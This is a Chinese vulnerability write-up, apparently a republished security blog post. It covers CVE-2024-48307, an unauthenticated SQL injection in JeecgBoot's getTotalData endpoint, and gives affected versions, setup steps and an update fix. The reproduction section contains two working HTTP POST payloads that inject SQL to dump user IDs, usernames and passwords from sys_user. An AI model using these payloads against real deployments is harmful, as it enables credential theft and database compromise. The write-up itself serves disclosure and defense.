前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >CVE-2024-48307:JeecgBoot SQL注入漏洞

CVE-2024-48307:JeecgBoot SQL注入漏洞

作者头像
Timeline Sec
发布2024-11-28 20:51:07
发布2024-11-28 20:51:07
2.3K00
代码可运行
举报
文章被收录于专栏:Timeline SecTimeline Sec
运行总次数:0
代码可运行

关注我们❤️,添加星标🌟,一起学安全! 作者:hexixi@Timeline Sec 本文字数:2248 阅读时长:2~4mins 声明:仅供学习参考使用,请勿用作违法用途,否则后果自负

0x01 简介

JeecgBoot是一款基于BPM的低代码平台!前后端分离架构 SpringBoot 2.x/3.x,SpringCloud,Ant Design&Vue3,Mybatis-plus,Shiro,JWT,支持微服务。具有代码生成器、权限管理、工作流引擎、监控报警、数据大屏等功能,可以帮助开发人员快速搭建企业级应用系统。

0x02 漏洞概述

漏洞编号:CVE-2024-48307

JeecgBoot v3.7.1中的/onlDragDatasetHead/getTotalData组件发现存在SQL注入漏洞。攻击者可以无需权限利用jimureport-dashboard-spring-boot-starter-1.8.1-beta.jar查询数据库,导致数据库信息泄露。

0x03 影响版本

jimureport-spring-boot-starter.version<=1.8.1

0x04 环境搭建

https://github.com/jeecgboot/JeecgBoot/releases

idea部署后端

进入jeecgboot-vue3目录下执行pnpm dev命令开启前端

0x05 漏洞复现

访问http://IP:8080/jeecg-boot/drag/onlDragDatasetHead/getTotalData可以发现服务可用,不能以get方式访问

根据源码构建json数据,尝试访问sys_user表的id

代码语言:javascript
代码运行次数:0
运行
复制
POST /jeecg-boot/drag/onlDragDatasetHead/getTotalData HTTP/1.1
Host: IP:8080
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close
Content-Length: 296
Content-Type: application/json

{"tableName": "sys_user", "compName": "test", "condition": {"filter": {}}, "config": {"assistValue": [], "assistType": [], "name": [{"fieldName": "concat(id)", "fieldType": "string"}, {"fieldName": "id", "fieldType": "string"}], "value": [{"fieldName": "id", "fieldType": "string"}], "type": []}}

查询username和password

代码语言:javascript
代码运行次数:0
运行
复制
POST /jeecg-boot/drag/onlDragDatasetHead/getTotalData HTTP/1.1
Host: IP:8080
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close
Content-Type: application/json
Content-Length: 311

{"tableName": "sys_user", "compName": "test", "condition": {"filter": {}}, "config": {"assistValue": [], "assistType": [], "name": [{"fieldName": "concat(username,0x3a,password)", "fieldType": "string"}, {"fieldName": "id", "fieldType": "string"}], "value": [{"fieldName": "id", "fieldType": "1"}], "type": []}}

0x06 修复方式

更新插件jimureport到最新版本。

参考链接

https://help.jeecg.com/setup/startup.html

历史漏洞

CNVD-2023-69437 CVE-2023-6307 CVE-2023-4450 CVE-2023-42268 CVE-2023-41578 CVE-2023-41544 CVE-2023-41543 CVE-2023-41542 CVE-2023-40989 CVE-2023-38992 CVE-2023-34659 CVE-2023-34603 CVE-2023-34602 CVE-2023-24789 CVE-2023-1784 CVE-2023-1741 CVE-2023-1454

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2024-11-27,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Timeline Sec 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 0x01 简介
  • 0x02 漏洞概述
  • 0x03 影响版本
  • 0x04 环境搭建
  • 0x05 漏洞复现
  • 0x06 修复方式
  • 参考链接
  • 历史漏洞
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档